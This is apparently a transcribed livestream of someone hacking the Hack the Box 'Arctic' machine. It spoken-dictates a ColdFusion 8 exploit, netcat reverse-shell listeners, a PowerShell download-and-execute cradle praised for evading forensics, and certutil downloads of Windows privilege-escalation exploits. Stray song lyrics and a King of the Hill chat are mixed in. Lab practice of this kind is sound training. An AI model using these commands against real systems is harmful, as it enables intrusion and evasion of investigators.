Next up we have Arctic, and I want to say I've done Arctic before, but I'm not positive. I have indeed done Arctic, so I'm not going to look at my notes. We're going to start fresh. But since I know I've done it, I won't be taking notes. So we'll just kind of do like flying off the cuff of my sleeve. Is that what they say? Who knows what they say? Arctic. Spawn the machine. Whoops. And then we'll get out of this. Of course, we're going to have to kill the pain because SSH is no longer functioning. What is going on here? Oh, that is also... So that's where our remote share was mounted. And then we'll get rid of that. Not even good. Well, yeah, I better make another directory. We'll call this one Arctic 2. And let's try to do it without auto recon this time. Make sure I'm not losing my ability to enumerate without it. And I'm going to close the notebook so I don't accidentally look. 10, 10, 10. That should be pretty easy to remember. Nmap. We'll do a version scan. 10, 10, 10, 11. Is that right? And then output all formats. We'll put it right here, and we'll just call it Nmap, I guess. The host seems down. Maybe we just need to give it a couple minutes. Who knows? We're getting a ping back, so maybe we can do Nmap now. Alright, I guess we'll just add the PN to it. It's taking a minute. So while that runs, I'm actually going to run and grab some more water. I'm going to switch over to the break screen. It won't actually take 5 minutes though. It'll be a lot quicker than that. I'll be right back. Alright, I am back and the scan has completed. So we did just scan most common ports. All we got back was 135, 8500, 49154. Looks like we're running RPC and then FMTP possibly. Who knows what that is. We'll try to... Let's run a full scan. And then we'll go down here. And we'll do something. We could do something here. I was gonna do some manual probing. 10, 10, 10, 11. On 8500. See what's going on here. Oh, nothing. Okay. I don't know what FMTP is. We'll try connecting with this. Okay. Hello. Weird. We'll see what's running on this port. Macromedia. It's been a long time since I've heard that. Macromedia Cold Fusion. Oh, okay. So it's like a web server, possibly. 10, 10, 10, 11, 8500. Maybe? Do we need to specify? Yeah, it's even showing up in my history here, so I've been on here before. This ends up being Cold Fusion server. And if I remember right, somewhere in here we'll find version disclosure. And then I think it's just vulnerable to something. It's taking forever to load though. What the heck is going on with this machine? It's almost like it's still trying to boot up. Chugging along slowly. It's not very often you see a Windows host with 445 not open. At least doing these challenges and stuff. So we finally got cfdocs. Doc home.html is the only one I've clicked on before. So let's see what that is. And then in here we have scripts, application.cfm, administrator, I think is password protected. Scripts. God, everything we do is just taking forever to load on this. What's going on? Honestly, we should probably be sending this stuff through Burp Suite to get like a cache of it, but I wonder if we're going to be better off. So that is all the ports. Can we do like a script scan directly at, we're going to call this one Cold Fusion, port 8500, no ping. We want to do a version scan. We also want to do a script scan. Cold Fusion 8. Alright, so we know that we're using Cold Fusion 8. And we have Cold Fusion in here. Cold Fusion Server 8. Administrator, enter CFM. It looks like we have some... Here we go. Remote command execution on Cold Fusion 8. Let's give that a shot. 5,557. Search exploit 557. Let's take a look at that guy and see what's going on. Cold Fusion 8. Looks like we're gonna do some imports first. This is a class, yep. Execute payload, listen connection. So first we're gonna give it lhost, which is me, and look at that. I'm not even gonna have to modify this at all. It's like I wrote this. So this is my IP address on Hack the Box, and that's the right port. That's the right host. 8500 is also the right port. So we don't need to modify this at all. We can just fire it off, it looks like. I wonder, I might need a listener running though. We'll wait and see. And we have a shell as Talus. Go to desktop. And we found the user flag there. I'm not even going to type it out. Let's see what other users are on this box. We have Tolus, guest, and administrator. So now we need to escalate privileges. Let's see. I wonder if I am an admin. Tolus is a user, not an admin. So this is where things will get kind of interesting because I'm not too great with Windows privilege escalation. We'll throw WinPs at it, see what happens. Windows Server 2008, and doesn't look like there's any hotfixes. So we might be able to just exploit this with some out-of-the-box kernel exploit. Let's take a look. MS16032. So we could use this one. Let's read a little bit about it. Microsoft Security Bulletin MS16032 important. Security update for secondary logon to address elevation of privileges. Execution summary. This security update resolves a vulnerability in Microsoft Windows. The vulnerability could allow an elevation of privileges if the Windows secondary logon service fails to properly manage request handles in memory. The security update is rated important for all supported editions of Windows. For more information, see affected software. Could run arbitrary code as an administrator. An attacker could then install programs, view, change, or delete data, or create new accounts with full user rights. To exploit this vulnerability, an attacker would first have to log onto the system, which we've done. An attacker could then run specifically crafted application that could exploit vulnerability and take control of affected system. The security update addresses vulnerability by correcting how Windows manages the handles in memory. So it seems pretty straightforward. And I think we might have a pre-compiled version we could use. What are we looking for? MS16032. So it looks like there's an option in MSF, but we just want to use the PowerShell. So let's go CD to 64. Oh no, PowerShell script's sitting right in front of my face. Let's run our Python web server, and then we'll do, well, I suppose I better look at the code here before we just go firing it away. PowerShell implementation targets vulnerable operating system support PowerShell v2+. In order for the race condition to succeed, the machine must have 2+ CPU cores. Ooh. Looks like we have 1 core. We could try anyway. Might not work. So we just need to execute this, and I'm gonna copy the command. Well, here's what we're gonna do. I don't want to modify this in place, so I'm gonna copy opt Windows kernel exploits MS16032. We're going to copy that here, and then we'll make some changes to that. We're just going to put the command at the bottom. And then we'll start our PowerShell, our Python web server, and then we'll do IEX. First we need to get into PowerShell. Don't kill my shell, please. Be nice. Oh, it's gonna kill my shell. We have an executable we could possibly just copy over and run. Let's try that. Although we weren't able to run WinPeas as an executable, so I guess maybe we're not going to be able to do this one either, but let's give it a shot. Who knows? And then we'll cd to C users, Tolus, desktop. Okay, we're gonna do copy that over. So it looks like it didn't work. Try it one more time. So this time it says created elevated process. But I'm still tollless. Is it creating... Oh my gosh. It's probably like spawning command shell in a different window. That's not good. Well, what are our other options? You know, we don't need to stick and try to do this exploit. We could move on to something different. OSCP cheat sheet. Could take a look at this one. I don't know that this is going to be too helpful, actually. Not really seeing anything useful in here. It's kind of just like a guide for enumeration. We have some precompiled exploits, which I think I'm using this one here, SecWiki precompiled exploits. Not being updated. Well, we could try to get the PowerShell module to work, or we could move on and find a different vector, possibly. Here's another good one, common exploits. So we'll take a look at this one. That's the one we were already looking at. Take a look at this one here. Windows kernel mode driver could allow elevation of privileges. MS15008. Systems that are running Windows Server 2008, 2008 R2, or 2012, or 2012 R2 affected if desktop experience feature is installed. It's hard to say. Systems will not be offered the update if desktop experience feature is not installed. I guess we could see if we have a compiled exploit for this. We do not. No exploits for this. So we'll move on to a different thing. You know, it kind of looks like MS16032, which is the one we were trying to use, is going to be our winner here. We have a link to exploit database. Let's check that out. This is exactly the code we were looking at. So we need to somehow get a PowerShell session. And we might be able to do that with, let's see, copy opt, invoke PowerShell TCP. Ooh. We're going to copy that to here. And then we'll put some command in here at the end. We'll update this to match our situation. We're going to want to do 10.10.16.4, and then we'll use 4.4.3 this time. We'll save it as script.ps1, and then we'll start our Python web server here. We'll get a listener, RL wrap, netcat NVLP 443. We'll do PowerShell command IEX new object. Is it net.web client, I think? Dot download string HTTP 10.10.16.4 port 80 script.ps1, and then I guess we just pray that it works. So far so good. There's our PowerShell session. Now we want to do a very similar thing. In case you're wondering, I don't think this is the Nishang version of the script. Maybe it is, but I'm using maybe it is the Nishang version of it. I thought I was using a custom version or something that was packaged with Kali, but maybe not. That's probably the Nishang version of that. Anywho, we have PowerShell. We need to run the exploit now, and we have not copied it down. We do have this version of it, so we can just do that. We'll start our Python web server again, and we're basically going to enter this command verbatim, but there's going to be one change we'll have to make. Oops, what did I do? Copy selection, we'll paste it here. We do need to change the name of the script because we want ms16.032.ps1. Okay, I don't quite understand what's going on here because it says I have a system shell, but I don't have a system shell. Did I have to run this in command prompt? So for some reason we're getting a system shell. It's working. It's just not letting us use the system shell. And I think it might be because we're in a PowerShell session. I wonder if we can use locate ms16.032. So looks like we use this on Optimum as well. I wonder if there's any difference in that. Diff this one against this one. We'll see what changes were made. Oh, what? Let's try this. Ah. So there is a difference. And it's this line here at the end where there's a command. So let's take a look at the source code again. And there should be like usage instructions. Is there a command? So I can't remember where the heck this came from. But I'm remembering that there are 2 different versions of this. One of them was modified, and I want to say it was an Empire. PowerShell Empire. Go to Empire. Server. I have no idea where it would be. PowerShell. No idea. But I'm pretty sure there was a second copy of this floating around somewhere. We'll just locate that. And then we're just going to use the one that I used for Optimum. We'll just make a copy of it. So here's where we enter in the command, and then we can basically pull our shell that we had, and this will allow us to so we're going to be executing the exploit. It'll get a system shell, and once it gets a system shell, it's going to run this command. So this command is going to reach out to the attack box on port 80 and grab shell.ps1, which is our TCP, our PowerShell, invoke PowerShell TCP from Nishang. So I think we just need a couple of listeners. We'll just kill this, and we'll start a listener on 443. So that's going to be to catch. That'll be to catch our admin shell, and then here we'll do PowerShell command IEX. New object. Web dot no net dot web client. Download string. HTTP to 10.16.4.80. This time we'll be getting MS 16.032.ps1. So this should launch the exploit, and then we'll see the script get pulled down. So if we watch right here, we should see this pull down, and then this pull down, and then an admin shell spawn here. So there's the first one. Now it should pull shell. For some reason, it's not pulling shell. What's going on? Okay, it pulled MS16032. It's not running the command. So I'm gonna check out Optimum, make sure we have the right one. Oh. This is the, okay, we've copied the wrong one, I think. So let's look at this one, and then we'll search for command. So this, okay, this is the correct copy of it, and the reason I wasn't finding it is because there's no dash in the name. So let's go back to Arctic, and then we'll get rid of that. MS16032, and we'll locate, invoke MS16032. So it is in PowerShell, Empire, Empire Server, Data, Module Source, Privesc, Invoke, MSO. So this is a modified version. The initial script was from that EDB 39719, but then the makers of PowerShell Empire added that command tick to it so we can execute commands. So let's copy that instead. User share PowerShell Empire, Empire Server. We were pretty close. Data, module source, Privesc, invoke, MS16032. Copy it here. And then we'll go down to the bottom, and that's where we're going to want to call our command. So I actually want to... Why is this not working for me? How do you get to the frickin' top? So here's an example, but they never added a flag. I remember watching this in, I think it was an IPSec video, maybe some other video. But whoever made the video was talking about how this is a modified version, yada yada, basically everything I just said. There is a dash in the function name. So now we'll go down to the bottom, and then we can do command IEX. We'll want to make sure to use PowerShell IEX, new object, net.web client, download string, HTTP 10.10.16.4, port 80, script.ps1. We're going to have to use single quotes there. Oh, I'll be out in a couple minutes to eat. What's going on? What did I do? So we'll put a single quote here. We'll end it with single quotes, end it with double quotes. Should be good. Alright, let's get back to it. So this time we're going to cancel. We'll run the exploit again. And my music disappeared. Let's get the music working again. After we finish this box, I'm going to be going to eat some dinner. So let's see what's going on. Ooh, this doesn't sound like free music. I don't want to get banned. Let's go to NCS. Hey, it's the same one we just listened to. That's all good. Alright, now we should be able to run PowerShell IEX, new command IEX, new object. So if you're watching this and you haven't done a ton of pen testing or a ton of like capture the flag stuff, this command I'm typing right now, you'll want to memorize this. You're going to need it. You probably only ever use it on Windows boxes, but it's worth remembering it. It's a pretty neat little way to just grab a PowerShell script, load it into memory, and start using it. So normally you would have to drop a file on disk, but then you're obviously leaving stuff behind for forensics. This is a way to just, you're loading it directly into memory, and the function doesn't touch disk at all. So new object, net.web client, download string, http:// 10.10.16.4 port 80. We're looking for invoke ms16032 with no dash .ps1 and then end quotes. So now we should see it pull shell after it does this, or pull script.ps1. As long as everything is all good. So far it doesn't look like it's all good. What did we do here? Seems okay, it should work. Maybe it's just taking a minute, who knows? Kind of seems like it's not doing anything. Yep. So we definitely messed something up. And a little bit of troubleshooting. We didn't mess the command up because it reached out and it got our script. So that seems to be where it stopped. I would assume there's something wrong with this. So this should pull it down, load it into memory, and allow us to run a command. So we're calling the function invoke ms16032. That is the name of this function. Modifications by Mike Bennick. Something's wrong here. Command PowerShell IEX new object. I wonder if we no, this seems right. PowerShell IEX new object. Let's check against we'll do tail invoke s16 and then we'll compare that. We probably just needed the last two lines, to be honest. And then we'll do the same for completed optimum. So the only difference here, well, I'll be damned. We're not calling the function correctly. And then we explicitly call out PowerShell here where we didn't there. I could have swore the function name was still with a dash. Let's do head. Because this is a copy of that, so it should be the same. Oh, did I copy it, but it never actually copied? That could be possible. I'm so confused right now. Yeah, it's like it's not a copy of it. So what I'm gonna do is, oh, because we didn't copy directly from there. We copied from the PowerShell Empire folder. That's weird. I could have swore I pulled this other one from PowerShell Empire too, but maybe not. So let's do copy, completed, optimum, invoke. We'll just copy that. And then we should just be able to use it as is. We're getting shell.ps1. I guess we need to get script.ps1. So probably the quickest solution is to move script to shell.ps1. And then we'll do it that way. And we'll just copy paste this command here. Okay, so far so good. We have a system shell. It should pull down our shell.ps1 now. It's still not doing it though. Wonder if we need to explicitly call out PowerShell, get that running. Then we'll hop down here and fix our exploit. We'll go down to the bottom, and then we'll just add PowerShell. Give that a try. Alright, we'll try this again. We're going to run this command essentially, but it'll be PowerShell command IEX new object net.webclient download string HTTP 10.10.16.4 port 80, not shell. We want invoke ms16032.ps1. Why are you not following the rest? Do the rest of it. What's going on? Hard machine. Hi ZP977. It's not too hard of a machine. It's one that I've done before. I just can't seem to get this exploit to work. So we're at privilege escalation right now. We've identified that MS16032 is the way to go. Let's see. MS16032 command. Invoke. Make sure that it has command in it. Okay, we're just going to copy from here now. We'll just grab it all. Let's open raw actually. And then we'll do wget and then we'll copy opt invoke PowerShell TCP1, not that one. Invoke MS16032. We're going to copy here. Then we'll open it up. And we know we need to run this. 10, 10, 16, 4, port 80, and we're looking for shell.ps1. And then just to be sure, I'll cd to hack the box, Arctic, and we'll do cat invoke ms16031 grep function. So there is no dash in the function name. Looks like we've done it correctly, and then we should be able to execute it. Once again, we gotta kill that, start a new shell. We got our shell back. So we're gonna run PowerShell command IEX new object net web client download string HTTP 10.10.16.4 port 80. And we want invoke ms16032.ps1. So this should work. Fingers crossed. Okay, now git shell. I'm gonna let this sit for a while. We'll see if it works. I feel like it would happen right away if it was gonna work, but I guess we'll find out. So instead of sitting around and waiting for this, we're just gonna let it sit like this. I'm gonna kill the stream for a minute here. I'm gonna go eat some dinner, spend some time with my family, help put my kids to bed, and then I'll hop back on. So I should be back in about an hour, maybe a little bit less, and we'll see you guys there. Alright, sorry about the lighting. My app to control my lights is still not working. So we left this sit while I was eating, and I still have no git request to get shell.ps1. So I guess we could take a look at the source code and figure out why this isn't running. Now maybe this would help if we ran this from a PowerShell session. Let's try that. So I'm going to spin up a PowerShell session. We know we can get a shell this way. We can nc nvlp. We'll do rlwrap 4444. And then, ooh, no. That other listener wants to do 4444, so we'll do 4445 for this one. And then vi shell. We'll change this so that it's coming in on a different port. Four, 5. We'll use this to get our initial shell. So now we can run PowerShell C IEX new object net.web client download string http :/10.10.16.4 port 80. We're going to get shell.ps1. Okay, we're getting a shell down here on 4445, and then we'll make a change to this. We'll put it on 4446. Actually, we'll put it on 443 like it was. And then we'll start a new listener, rlwrap 443. Now we'll try to execute this chain from here. So we should be able to do IEX download new object net.web client download string http :/10.10.16.4 port 80. This time we're getting invoke ms16032.ps1, and that should work. It didn't work. At least I don't think it did. Okay. Well, this should be running a command. Did we change our command in shell to port 443? So that should connect down here when it works. This should work. I don't know what's going on. For some reason, it's not executing the command. So at this point, I'm going to take a look at the walkthrough and see what I did. My own walkthrough. We'll see how I exploited this last time. Hack the box. Arctic. Alright, last time we found Cold Fusion. We used this exact exploit. We are Tolus. We used WinPeas. Exploit suggester wanted MS10059. It worked. So we just use a different MS10059. But yeah, that's the same one I used. Weird. Maybe you find something interesting. Exploit suggester. Well, I have no idea why this isn't working. I used a different exploit last time, but that shouldn't make a difference. So, why would invoke PowerShell TCP not work? Well, it is. That's working. It's this other one that's not working. And actually, new object. Yeah, this should work. I'm a bit confused about why it's not working. It's like it's never calling the function that we want to call. What if we do vi shell? No, let's go vi invoke ms031. We've gone onto the bottom, and we're going to move this command to. We'll just move the inner part here. Copy selection. We'll move it to here, and we'll say we want to execute that. Oh no, we do need the whole command, so we'll just copy the whole thing and we'll move it here at the end. We'll say that we want to do that after we've loaded our Alright, so now we're going to be loading that, which actually, I feel like it's already loaded. We can probably just run this part here. What's going on with this exploit? Why can I not run a command? We're going for shell, and shell is, well, it's not even pulling shell down. It's not executing the command. It's just doing the function call, not executing the command. So let's take a look again at this script, and why would it do that? Let's actually open it up in VS Code. We'll take a look at this exploit and see what's going on under the hood. Maybe we can figure something out. Home, Nate, hack the box, Arctic 2. Alright, so this is a little bit nicer. We get some syntax highlighting. Here's an example. The command is surrounded in double quotes. That should be working. We'll run the IEX download Cradle as system. So far, I don't see a function call. Well, I don't see even... Oh, it's right here up at the top. Function invoke MS16032. Parameters. Position 0, mandatory true, string is command. So it looks like we wouldn't even need to specify command. Although that is the name of this, the parameter. Are we calling the function correctly? We have to be. It's... I'm so confused by this. So this should fail when we do... Oh. I know what's happening, I think. Possibly. Get modules. Is that how you do that? Oh, that's not what I wanted to do. There's some way to list like the loaded modules. Let's take a look at that. PowerShell, loaded modules. Yeah, get module. That have been imported or that can be imported. So maybe we need to be patient and wait for output from this? Who knows? Oh, it's supposed to be get module, not get modules. Alright, I am gonna reboot the box and see. I think what's happened is our old version of the script is sitting in memory. At least that seems to be the case because it's completely ignoring the command that we're giving it. I guess we'll have to see if that's what's going on. We'll give this a little bit of time to reboot. Alright, it sounds like the box is done rebooting. Says it will be reset. Let's do a refresh and see if it's up. So it seems to be up and running. Let's take a look again at this is all dead. We'll go ahead and cancel out of that and fire a new attempt. Alright, we have a shell again. So, how do we want to do this? I think we should just run... Let's just run it from here. And... I guess hope for the best. So first we're going to be grabbing invoke MS PS1. Let's go ahead and put that in here again. Invoke MS 16031. Is it 031? No, 032. MS 16032. And then we'll say command IEX. Well, let's do this. Let's do who am I and see if that works. Let's try like a proof of concept, make sure it's actually working, kind of make the troubleshooting a little bit easier. We're gonna do PowerShell command IEX, new object, net.web client, download string. Oh, I totally lied and said I was still working on Bastion. That was a lie. Goodness. It's like I'm stoned or something. I swear. Bastion is done. So I should have updated that to say Arctic. We'll say done. I'm not sure if that'll actually update midstream, but hopefully. And then we're gonna do we'll execute this. How about that? HTTP 10.10.16.4 port 80. We're gonna go with invoke MS16032.ps1. So that should load it into memory. It should execute it. We should see a who am I output up here. It says we have a system shell, but I've yet to see it. So something is broken. Something's definitely broken. It's like this exploit's broken. Well, what the heck? I mean, it definitely worked in Optimum. What did we do here? WinPiece found password, upgrade to a PowerShell shell so we can run Sherlock. Then we load and run Sherlock. It looks like the system was vulnerable to MS16032. Unfortunately, our shell is running in a 32-bit process, so we need to drop the shell and upgrade it by running PowerShell native. Oh, could that be happening to us here too? So we had to use a command to see if our shell was running 64-bit, because it needs to be a 64-bit shell for this to work. And I think the command to do that is environment is 64-bit process. Perfect. So we'll try that here. Look at this. Oh, come on. I should just, instead of going with this exploit because Google said so, I should do something else. Let's choose a different port here. Do 4446. I should run Sherlock, honestly, just for shits and gigs. Let's do copy invoke Sherlock. It's not in here. Locate invoke Sherlock.ps1. Locate Sherlock. Let's go with that. Copy to here. Cat Sherlock, we'll grep for function. We want to run all vulns. And then we're already hosting from that folder, so we'll just run it up here. PowerShell command IEX new object .web client download string HTTP 10.10.16.4 port 80. We're doing Sherlock.ps1 this time. Okay, we have some output. Let's see what's going on here. Kitropod not supported on 64-bit. MS10092 appears vulnerable. So that might be worth looking at. $15,051. MS16032, that's what we've been using, and it says not vulnerable. That's weird. So what's Sherlock telling us to use? Sherlock wants us to use MS15051 or MS10092. Let's see what that is. MS10092. I've never used that one before. MS10092. MS10092. There isn't one. So what's our other option? There was another one. 15051. MS15051. We have compiled exe. We have a 32-bit exploit. So it looks like we just use the exploit exe and type a command into it. We can run it straight from command prompt, so that's pretty cool. Let's go into the compiled, and then we'll copy tiehouse64.exe to home Nate, hack the box, Arctic 2. Alright, now we can change directory to there. Why does my shell never come back after? Oh, there it is. Alright. Can't do up arrow. So, we'll cd to users, cd tolus, desktop, cert util, f_url cache, 10.10.16.4 port 80, tiehouse64.exe, and we're going to save it as exploit.exe. Command completed successfully. We do have an exploit.exe, and we'll say, who am I? Nothing. This is doing absolutely nothing. Let's try... We'll try the 32-bit version, I guess. So let's go to here. MS, what the hell was that? MS 15051. Copy 37 to home Nate, hack the box, Arctic 2. And then we'll try that. Cert util, f_url cache, 10.10.16.4 port 80. This time we're going to be getting 37049-32.exe, and we'll call it I'm gonna just go a.exe. You have a.exe. Who am I? Nothing. Well, this is kind of starting to make me a little upset. I wonder if we look at a walkthrough, what their path is. No, let's not do that. We need to make this work. I've exploited this before. I should be able to do it again. But first, a bathroom break. So I'm going to go on a 5-minute break. We'll see you guys in a minute.
Take my eyes open to force reality. Why can't you just let me eat my weight in of make-believe. Kids screaming in their cradles, profanities. Some days I feel skinnier than all the other days. Sometimes I can't tell if my body belongs to me. I love everything. Fire spreading all around my room. My world's so bright, it's hard to breathe, but that's alright. Hush. I wanna taste your content, hold your breath and feel the tension. Devils hide behind redemption. Honesty is a one-way gate to hell. I wanna taste consumption, breathe faster to waste oxygen. Hear the children sing aloud. It's music till the wick burns out. Just wanna be carefree lately, yeah. Just kicking up daisies. Got one too many quarters in my pockets. Counting like the four-leaf clovers in my locket. Untied laces, yeah. Just tripping on daydreams. Got dirty little lullabies playing on repeat. Might as well just ride around the nursery and count sheep.
Over the edge, feel like I'm floating through the air. The pain I felt is paid for, all is said and done. Oh, I am restricted, fixed upon the web. I need to kick the habit that my mind is breathing in. Break out, I've got to see. Spent all my life holding all of it closely. I played it innocent, a feel of discontent. I'm finally facing it all, fearless. Burning the bridge that keeps us. I'm here and I'm feeling exaggerated, that's what you assume. The story's over now, I must conclude. I am conflicted, watching where I step still, hanging in the balance, not the light
Alright, I'm back. So, a.exe doesn't work. Exploit.exe also doesn't work. Not gonna F with that. Not gonna F with this. MS16032. Command not working. So, can I pull system info? Let's try this. System info. We'll save it to systeminfo.txt. Oh, wow, nice. Yeah, that didn't do anything. Systeminfo.exe. Systeminfo. Okay, we'll just do the old copy paste. Oh, that's not going to turn out very good. Ooh, let's see. How can I do this? System info, and we'll save it to output.txt maybe. Is that going to work? Perfect. Now, we'll copy this over to our local machine. Oh, what's the PySMB? We need a PySMB server. PySMB. Oh, I got the hiccups. Goodness. We're going to get rid of this again. And we'll do PySMB. SMB server.py. Perfect. We'll do that. Config file parsed. Say net use. Whack whack 10.10.16.4 share. User is df. Password is df. And then we'll move output txt to 10.10.16.4/share. And then we should have access to that now. Do. No. It's not there. Is that... where is this? We're in the Arctic 2 folder. Let's try it again. Copy output.txt to 10.10.16.4/share. One file copied. Still no output. There is an output. Okay. Cat output.txt. Perfect. So now we have system info, and we're gonna do opt Windows exploit suggester. Look at that. We named the file right. We could just run it. We're gonna give this a minute to run. We'll see what it comes back with. Windows exploit suggester has a little bit better options compared to Sherlock. I think Sherlock's just checking for a handful of things, as to where this will check everything in the database, which is constantly being updated. Granted, I didn't update my database. The last time I have done so was January 23rd. But I feel like nothing has really changed in the Windows Server. Is this Windows Server 2003 threat landscape? I feel like that's kind of a closed book, hopefully. Who knows? Maybe people are still poking at it, but... man, that's the thing. Windows exploit suggester is great, but it takes so darn long. I wonder if it could be, if the code could be improved to run any quicker. Oh, come on, you son of a monkey. Once we get this going, I'm hoping to find an exploit that we can actually run. And then, you know, hopefully we'll root this guy and move on to the next one. Because this is... We're getting close to the end of the list here. We've got one more left, which is active. And I think that's one I've also done before. Sure to be just like this, where kind of have to do some mental recall of what's going on. I have been noticing that by going through these boxes over and over again, I'm really refining my process. So privilege escalation was a weak point for me for a while, and I've watched the videos. The Cyber Mentor has a pretty good set of videos for Windows privilege escalation and Linux, and I've watched those. I took notes. I have notes on privilege escalation. I've done the OSCP material on privilege escalation. There's just nothing that can compare to the effectiveness of hands-on. And that's one thing I love about the OSCP and other practical hands-on exams. That's why this is my first cert. That's why I'm going after OSCP first. I don't want to say that I know what I'm doing. I want to show that I know what I'm doing. So OSCP gives you a chance to do that. And if I ever pass anyhow, maybe I don't know what I'm doing. You know, if I finish this, maybe we'll just play some King of the Hill tonight. That seems like a good option. We're pretty far ahead of schedule. Anyone want to do King of the Hill tonight? Might as well hop on, try Hack Me. See if anyone is playing King of the Hill. Well, log me in. Please don't dox me. Yo, I'm ranked in the top 1% on Try Hack Me. Check that out. Top 1%. Woo woo. Compete. King of the Hill. Is there a game going? Hey, there is a game going. There's 2 users on it. Oh no, this guy is a beast. I don't want to go up against him. This is taking a while, goodness. I wonder what the code looks like. Oh, that's not at all what I wanted. If there is a database switch, split name and extension, CSV. If CSV and extension database file detected. Please install and upgrade OpenPixel. Loop through the XLS. Oh God. No wonder. You know, if we rewrote this with pandas, I wonder, I feel like it would be quicker. Maybe even work better. Yeah, I'm gonna have to maybe contribute. This is taking just forever. What's going on here? Hurry up. Why you gotta be so slow? Don't you know I wanna go? Oh my gosh. Search using search exploit. Wow. I think we might be doing too much with the code here, guys. Yep, I guess. Here we go. Oh, that's wonderful. That's absolutely wonderful. Well, I've had it up to here with you. Alright? I'm not going to be doing that anymore. If you're going to take so long. What do you mean you couldn't figure out that Windows Server 2008 R2 standard? Is that not in here? 2008. Here we go. Copy. I guess, let's let it run again. Why does this take so freaking long? I should just, like, sit down and maybe see if I can make some changes to this. It's a pretty big project. 1,600 lines of code. If we got rid of all the comments, that would make a huge difference. Your request. Well, that's for update. Oh my gosh, this had to be all put in manually? That's why it's so many lines. It's like a database within the code. And I feel like these should all be tuples or tuples, because we're not extending them. We know that it's a fixed size. I feel like the person who coded this might be kind of new to Python, possibly. Maybe. Or there's a reason that they're using a list of lists like this. OS name array for needle in OS name array. If Windows needle OS text server. This is so bad. The code for this is so bad. No wonder it runs so slow. If it doesn't work this time, then I quit. And I'm never using it again. I mean, at this point, honestly, it's just quicker to look up on Google some exploits for this. All right, let's see here. Let's see if we can race it. Privilege escalation. Well, we've already done it, but Windows versions and configuration. That's how you get it. This is some enumeration stuff, it looks like. Looting for passwords, processing, enumeration tasks, incorrect permissions, WSL, unquoted service path, path interception, named pipes, kernel exploitation. That's kind of what we're looking for here. List of exploits, kernels. Yeah, we know about that already. Bulletin 1717. Local privilege escalation. Nothing great here. To cross-compile a program from Kali, honestly, this is like pretty helpful. You're taking forever. I feel like I should watch a Smosh video while I wait for this. Y'all ever watch Smosh? This is absolutely taking forever. I feel like the original Python 2 version didn't take this long. Come on. What did we get when we searched here? MS16032. Let's say exploit So we found it on exploit database. This one is PowerShell Suite. The exploit targets all vulnerable operating systems that support PowerShell v2. You know, something we could do while we wait for this to load, we could try to get an agent on it, possibly. And then run privilege escalation that way. Let's do it. All this manual stuff is for the birds. So let's cancel out of that, and we'll do sudo n4j non-neo4j console. No, this is not what we want at all. We want PowerShell Empire server. Yo, what? Okay, maybe we just do it like this then. And then star killer. Alright, star killer, where's my credentials? Because I need to clear them out. How do I clear them out? Well, let's find out. Check all, delete. Boom, it's done. Oh, one page gone. Boom, it's done. Listeners, let's get rid of them all. Boom, it's done. Yes. And let's create a new, well, let's get rid of the stagers as well. And we'll create a new listener. It's going to be HTTP type. And we'll call it HTTP1. We'll put her on 1337. Looks good to me. Might as well be all zeros. We'll get this. Oh, failed to start listener. Is it because we need to do like 4444? Let's go with 4455. 4455. There we go. A new stager. Create a new stager. Let's say that it's gonna be Windows. To be honest, I don't know. Launcher.bat? Why not? Star killer name, Windows Launcher.bat, language PowerShell, okay. And we'll just, yeah, submit that. Invalid listener ID or name. Listener, let's call it, oh, we need to specify our listener. There, let's try that. Got it? Alright, agents, we have none. Cool. Let's download our stager. How do I get the stager? Actions download. We'll save it in Hack the Box. Completed Arctic 2. Save her there. And then we'll copy it over. Boop, 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 boop. How do we want to do this? Oh, it's finally done. Cert util F URL cache HTTP : // 10.10.16.4 port 80. We're looking for launcher.bat and we'll save it as launcher.bat. And let's run it. Launcher.bat. Now we should have an active agent. We don't have an agent. So it didn't work. Whew. Now it might work. Maybe. Or maybe not. I'm not seeing anything. Yeah, we just broke the shell was all. Alright, well, that's a no-go. Let's see what we got here. We just want just the ease. Metasploit, Metasploit. Exploits. 1237. 1111. 1059. Let's try this one. MS10059. CD opt. Windows kernel exploits. CD to this folder. MS10059. What do we got in here? Churrasquito. I have no idea what the heck that is. Let's take a look at the README for usage. Hey, it's going to let us execute a command, it looks like, maybe. Cool. Very similar to what we've been doing, but what the heck? What could go wrong? Python 3, let's use port 81. CD to C, users, Tolus, desktop. Ooh, almost worked. CDC, users, Tolus, desktop. And then we'll use cert util to copy it down. F URL cache, HTTP 10.10.16.4 81. And what the heck was the name of the file? Oh, I like it. I like it. So this wants us to set up a listener for a callback. Let's use 4464. So we need to do ms10.059.exe, IP address 10.10.16.4, and our port 4464. I'm gonna be so pumped if this works, you guys. You have no idea. Oh, come on, don't fail me now. Everything's choking on execution. It makes me think that the shell is just like, oh, no way. Ah, okay. Don't get too excited. Yes! Woo! Oh my gosh. We did it, folks. No walkthrough needed. Kind of got lucky there at the end, to be honest, but I'm going to call it quits. Well, maybe not. Maybe I'll stream. We're going to play some King of the Hill, so maybe I'll keep streaming. Let's do that. So we've done this box. Exit a billion times. Exit, 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 yes. Alright, we'll get all this stuff shut down. We'll close out of my complaints and we'll get a new, let's see, AT0. So we have Try Hack Me, we have King of the Hill. Let's create a private game. Oh! start time. Let's say, oh, I got a link. There's a link somewhere. If you cheat, you will win. What is it and how do we play? Hacking contest. Alright, JRAM, I like you, man, but I'm gonna send you a screenshot of how to play. We'll do a private game that starts in 15.5. I wish they had 10 minutes. That'd be a nice happy medium. We're going to do a random machine. We'll see what happens. So I'm going to send out the invite link here. Invitation link. So 15 minutes. What do we do with 15 minutes? Voice chat. Box hacking. That seems legit. Uh-oh, I lost my audio. My audio settings must be jacked up in voice and video. Indeed. There we go. Hearing all kinds of noises. I don't know if that's... Oh, Slendy Man, what's up? Not a whole lot. I need to figure out how to kill my music.
I've never done this. I'm kind of excited. I'm reading it now.
It's not too bad. I mean, what's your experience level? You know how to run Nmap?
Yeah, no. I'm good with that.
Alright.
I practice frequent enough, but I've just never done this type of game. The patching the machine part, how does that work? Like,
There's kind of rules, like you can't just, like if SSH is on and there's a credential somewhere, you can't just like disable SSH. You could change the port. I'm not sure if you're supposed to change passwords. We're in a private game, so you're not going to like piss anyone off. So but if you get on like public games, people get really pissed if you do stuff against the rules. So
okay. So I'm guessing you just change configurations and such?
yeah, and then I really don't do a bunch of patching. I don't have a lot of background with like blue team and I guess that side of it. So I usually just get in and then like set myself to king and then I guess fuck with other people's shells if they have them.
Okay. So, oh wait, what am I doing? I just signed in. Is there?
Oh, there's like God, there's something in your account settings you have to set. If you go to profile,
I'm in the game.
